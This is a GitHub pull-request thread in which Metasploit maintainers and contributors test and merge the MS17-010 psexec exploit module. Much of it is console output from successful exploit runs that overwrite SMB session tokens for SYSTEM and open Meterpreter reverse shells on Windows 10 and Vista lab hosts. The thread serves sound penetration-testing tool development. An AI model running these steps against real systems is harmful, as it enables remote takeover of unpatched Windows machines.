/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:655:in `each'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:655:in `exploit_fish_barrel'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:40:in `eternal_pwn'
/home/msfuser/rapid7/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:99:in `exploit'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/home/msfuser/rapid7/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/home/msfuser/rapid7/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:360:in `load_resource'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:218:in `block in initialize'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:217:in `each'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:217:in `initialize'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'

Other tests still running.

@zerosum0x0

This comment has been minimized.

Contributor

zerosum0x0 commented Feb 1, 2018

Woops. Wrong key when adding x64 to dynamite list, try Win2003x64_SP1 again please.

@bwatters-r7

This comment has been minimized.

Contributor

bwatters-r7 commented Feb 1, 2018

Roger. The tests are scripted, but it will grab the most up-to-date version of the code for the PR, so your new push would have been used on the next OS.

Here are the results so far:
Win2003x86_SP0
PASSED
Win2003x64_SP1
FAILED - already mentioned
Win2003x86_SP1
PASSED
Win2003x86_R2_SP1
PASSED
Win2003x86_R2_SP2
PASSED
Win2008x86_SP1
FAILED - netlogon service timeout, will try again
Win2008x64
PASSED
Win2008x64_R2_SP1
FAILED - test system failure; will try again

@iNoSec

This comment has been minimized.

iNoSec commented Feb 1, 2018

@bwatters-r7 you can Say me how you do to add it to the framework please ?

@bcoles

This comment has been minimized.

Contributor

bcoles commented Feb 1, 2018

@iNoSec something like (untested)

git clone https://github.com/rapid7/metasploit-framework/
cd metasploit-framework
git remote add rs https://github.com/RiskSense-Ops/metasploit-framework/
git pull rs eternalsynergy

Or alternatively:

git clone https://github.com/rapid7/metasploit-framework/
cd metasploit-framework
git fetch origin pull/9473/head:eternalsynergy
git checkout eternalsynergy
@bwatters-r7

This comment has been minimized.

Contributor

bwatters-r7 commented Feb 1, 2018

After checking the Win2008x86_SP1 VM, I noticed I forgot to disable Windows Firewall when I set it up originally. Disabled it, reset and re-ran all tests last night:

Win2003x86_SP0
PASSED
Win2003x64_SP1
PASSED
Win2003x86_SP1
PASSED
Win2003x86_R2_SP1
PASSED
Win2003x86_R2_SP2
PASSED
Win2008x86_SP1
PASSED
Win2008x64
PASSED
Win2008x64_R2_SP1
PASSED

@busterb

This comment has been minimized.

Contributor

busterb commented Feb 2, 2018

So we have just 3 more OSes to test to land this?

@zerosum0x0

This comment has been minimized.

Contributor

zerosum0x0 commented Feb 2, 2018

Success on Windows 10 Enterprise 10240 x64 authenticated/native target

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.127:4444 
[*] 192.168.1.105:445 - Target OS: Windows 10 Enterprise 10240
[*] 192.168.1.105:445 - Connected to named pipe: netlogon
[*] 192.168.1.105:445 - Frag pool info leak: arch=x64, size=0x20
[*] 192.168.1.105:445 - GROOM_POOL_SIZE: 0x5030
[*] 192.168.1.105:445 - BRIDE_TRANS_SIZE: 0xf90
[*] 192.168.1.105:445 - Attempting leak #0
[*] 192.168.1.105:445 - CONNECTION: 0xffffe00180ae1020
[*] 192.168.1.105:445 - SESSION: 0xffffc0007c5e0390
[*] 192.168.1.105:445 - FLINK: 0xffffc0007487f048
[*] 192.168.1.105:445 - InParam: 0xffffc0007c05416c
[*] 192.168.1.105:445 - MID: 0x4307
[-] 192.168.1.105:445 - Unexpected Flink alignment, delta: -77d5fb8
[*] 192.168.1.105:445 - Align transaction and leak failed, attempt #0
[*] 192.168.1.105:445 - Attempting leak #1
[*] 192.168.1.105:445 - CONNECTION: 0xffffe00180ae1020
[*] 192.168.1.105:445 - SESSION: 0xffffc0007c5e0390
[*] 192.168.1.105:445 - FLINK: 0xffffc0007c06c098
[*] 192.168.1.105:445 - InParam: 0xffffc0007c06616c
[*] 192.168.1.105:445 - MID: 0x4303
[*] 192.168.1.105:445 - Leaked connection struct (0xffffe00180ae1020), performing WriteAndX type confusion
[*] 192.168.1.105:445 - Control of groom transaction
[*] 192.168.1.105:445 - Built a write-what-where primitive...
[*] 192.168.1.105:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xffffc0007c5e045a
[*] 192.168.1.105:445 - Session Data: 0a02060100000000505bd27e01e0ffff0100000000000000708917d000f8ffff708917d000f8ffff08000000000000002010ae8001e0ffff000000000000000000000000000000000000000000000000000000000000000002001e000000000078045e7c00c0ffff5262a8edd59bd3011c6dbbedd59bd301ff3f96d536ffff7fffffffffffffff7f0000000000000000ec1a280000000000951ff84d3f2243f4d3612d7da75b918f000000000000000050d0057900c0ffff0411020000080000020000000100010000000001000000000000000000000000190000000c00000000000000000000002a0000000000000000000000000000000000000000000000
[*] 192.168.1.105:445 - session dat len = 256
[*] 192.168.1.105:445 - Session ctx offset = b0
[*] 192.168.1.105:445 - Session ctx data = 50d0057900c0ffff0411020000080000020000000100010000000001000000000000000000000000190000000c00000000000000000000002a0000000000000000000000000000000000000000000000
[*] 192.168.1.105:445 - secCtxAddr: ffffc0007905d050
[*] 192.168.1.105:445 - Reading secCtxData from ffffc0007905d050
[*] 192.168.1.105:445 - Read data from secCtx: 2a023800030000000300000000000000e09ebd7300c0ffff0000000000000000000000000000000000000000000000000000000000000000
[*] 192.168.1.105:445 - Overwrote token SID security context with fake context
[+] 192.168.1.105:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.105:445 - Powershell command length: 2537
[*] 192.168.1.105:445 - Executing the payload...
[*] 192.168.1.105:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.105[\svcctl] ...
[*] 192.168.1.105:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.105[\svcctl] ...
[*] 192.168.1.105:445 - Obtaining a service manager handle...
[*] 192.168.1.105:445 - Creating the service...
[+] 192.168.1.105:445 - Successfully created the service
[*] 192.168.1.105:445 - Starting the service...
[+] 192.168.1.105:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.1.105:445 - Removing the service...
[+] 192.168.1.105:445 - Successfully removed the service
[*] 192.168.1.105:445 - Closing service handle...
[*] Sending stage (205891 bytes) to 192.168.1.105
[*] Meterpreter session 7 opened (192.168.1.127:4444 -> 192.168.1.105:49484) at 2018-02-01 20:28:46 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IL17M8C
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
@zerosum0x0

This comment has been minimized.

Contributor

zerosum0x0 commented Feb 2, 2018

Success on Windows 10 Enterprise 10240 x86 authenticated/native target

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.127:4444 
[*] 192.168.1.249:445 - Target OS: Windows 10 Enterprise 10240
[*] 192.168.1.249:445 - Connected to named pipe: netlogon
[*] 192.168.1.249:445 - Frag pool info leak: arch=x86, size=0x10
[*] 192.168.1.249:445 - GROOM_POOL_SIZE: 0x5020
[*] 192.168.1.249:445 - BRIDE_TRANS_SIZE: 0xfc0
[*] 192.168.1.249:445 - Attempting leak #0
[*] 192.168.1.249:445 - CONNECTION: 0x8d2334f0
[*] 192.168.1.249:445 - SESSION: 0xa006c648
[*] 192.168.1.249:445 - FLINK: 0xad791058
[*] 192.168.1.249:445 - InParam: 0xad78b0e4
[*] 192.168.1.249:445 - MID: 0x4403
[*] 192.168.1.249:445 - Leaked connection struct (0x8d2334f0), performing WriteAndX type confusion
[*] 192.168.1.249:445 - Control of groom transaction
[*] 192.168.1.249:445 - Built a write-what-where primitive...
[*] 192.168.1.249:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xa006c6e6
[*] 192.168.1.249:445 - Session Data: 0a02d600000000000884238d010000000000000004312d9a04312d9a01000000f034238d0000000000000000000000000000000002001e0000c706a000000000043371fdd69bd3015bb77afdd69bd301ff3f96d536ffff7fffffffffffffff7f0000000000000000d05a1e00000000007cb558373067dce930e6f9af34252ac40000000000000000c8c306a004110200000800000200000001000100000000010000000000000000010000000800000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[*] 192.168.1.249:445 - session dat len = 256
[*] 192.168.1.249:445 - Session ctx offset = 88
[*] 192.168.1.249:445 - Session ctx data = c8c306a004110200000800000200000001000100000000010000000000000000010000000800000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[*] 192.168.1.249:445 - secCtxAddr: a006c3c8
[*] 192.168.1.249:445 - Reading secCtxData from a006c3c8
[*] 192.168.1.249:445 - Read data from secCtx: 2a022400030000000300000040ca888e0000000000000000000000000000000000000000
[*] 192.168.1.249:445 - Overwrote token SID security context with fake context
[+] 192.168.1.249:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.249:445 - Powershell command length: 2388
[*] 192.168.1.249:445 - Executing the payload...
[*] 192.168.1.249:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.249[\svcctl] ...
[*] 192.168.1.249:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.249[\svcctl] ...
[*] 192.168.1.249:445 - Obtaining a service manager handle...
[*] 192.168.1.249:445 - Creating the service...
[+] 192.168.1.249:445 - Successfully created the service
[*] 192.168.1.249:445 - Starting the service...
[+] 192.168.1.249:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.1.249:445 - Removing the service...
[+] 192.168.1.249:445 - Successfully removed the service
[*] 192.168.1.249:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 192.168.1.249
[*] Meterpreter session 8 opened (192.168.1.127:4444 -> 192.168.1.249:49506) at 2018-02-01 20:36:33 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-G60M8SH
OS              : Windows 10 (Build 10240).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
@rootsecdev

This comment has been minimized.

rootsecdev commented Feb 2, 2018

I've confirmed Windows Vista x64 is working.

msf exploit(windows/smb/ms17_010_psexec) > exploit

[] Started reverse TCP handler on 192.168.206.128:4444
[
] 192.168.206.129:445 - Target OS: Windows Vista (TM) Business 6000
[] 192.168.206.129:445 - Filling barrel with fish... done
[
] 192.168.206.129:445 - <---------------- | Entering Danger Zone | ---------------->
[] 192.168.206.129:445 - [] Preparing dynamite...
[] 192.168.206.129:445 - [] Trying stick 1 (x64)...Boom!
[] 192.168.206.129:445 - [+] Successfully Leaked Transaction!
[
] 192.168.206.129:445 - [+] Successfully caught Fish-in-a-barrel
[] 192.168.206.129:445 - <---------------- | Leaving Danger Zone | ---------------->
[
] 192.168.206.129:445 - Reading from CONNECTION struct at: 0xfffffa80083a6ba0
[] 192.168.206.129:445 - Built a write-what-where primitive...
[+] 192.168.206.129:445 - Overwrite complete... SYSTEM session obtained!
[
] 192.168.206.129:445 - Selecting native target
[] 192.168.206.129:445 - Uploading payload...
[
] 192.168.206.129:445 - Created \xwMEdFGQ.exe...
[+] 192.168.206.129:445 - Service started successfully...
[] 192.168.206.129:445 - Deleting \xwMEdFGQ.exe...
[
] Sending stage (179779 bytes) to 192.168.206.129
[*] Meterpreter session 2 opened (192.168.206.128:4444 -> 192.168.206.129:49159) at 2018-02-01 22:21:05 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : VISTA1
OS : Windows Vista (Build 6000).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Feb 2, 2018

Thanks for all the testing, folks! I think we can leave the remaining to-dos for the next PR. Let us know when you're ready to ship this, @zerosum0x0. 👍

@zerosum0x0

This comment has been minimized.

Contributor

zerosum0x0 commented Feb 2, 2018

@wvu-r7 Seems good to me

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request Feb 2, 2018

@wvu-r7 wvu-r7 merged commit ffc7e07 into rapid7:master Feb 2, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
@wvu-r7

This comment has been minimized.

Contributor

wvu-r7 commented Feb 2, 2018

Release Notes

Auxiliary and exploit modules for EternalSynergy, EternalRomance, and EternalChampion have been added to the framework. The exploits/windows/smb/ms17_010_psexec module exploits SMB with vulnerabilities in MS17-010 to give you the ability to run any command as SYSTEM or stage Meterpreter. This exploit is more reliable than the EternalBlue exploit, but requires a named pipe.

@zerosum0x0 zerosum0x0 deleted the RiskSense-Ops:eternalsynergy branch Feb 2, 2018

jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 2, 2018

@rapid7 rapid7 deleted a comment from hktalent Feb 7, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Feb 7, 2018

As a general public service announcement:

If you would like to use this module, you need to use a version of Metasploit that already has it packaged, or wait until your Linux distribution is shipping it. Just copying the module file will not work on an older version of Metasploit Framework.

This is also a closed PR. If you have bugs, file them as new tickets. If you have general questions or need help, ask on IRC, slack, or in a help forum. You can find information on these channels at https://metasploit.com.

Thanks!

@hktalent

This comment has been minimized.

hktalent commented Feb 7, 2018

@zerosum0x0 @bcoles @wvu-r7 @ronnieflip @mkienow-r7

route print                                                                                                                    

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.0.0        Session 86


set ReverseAllowProxy true


msf exploit(windows/smb/ms17_010_psexec) > [*] 192.168.10.102:445 - Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[-] 192.168.10.102:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Unable to find accessible named pipe!
@bcoles

This comment has been minimized.

Contributor

bcoles commented Feb 7, 2018

@hktalent This PR is closed. Please create a new issue.

@rapid7 rapid7 locked as resolved and limited conversation to collaborators Feb 7, 2018

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.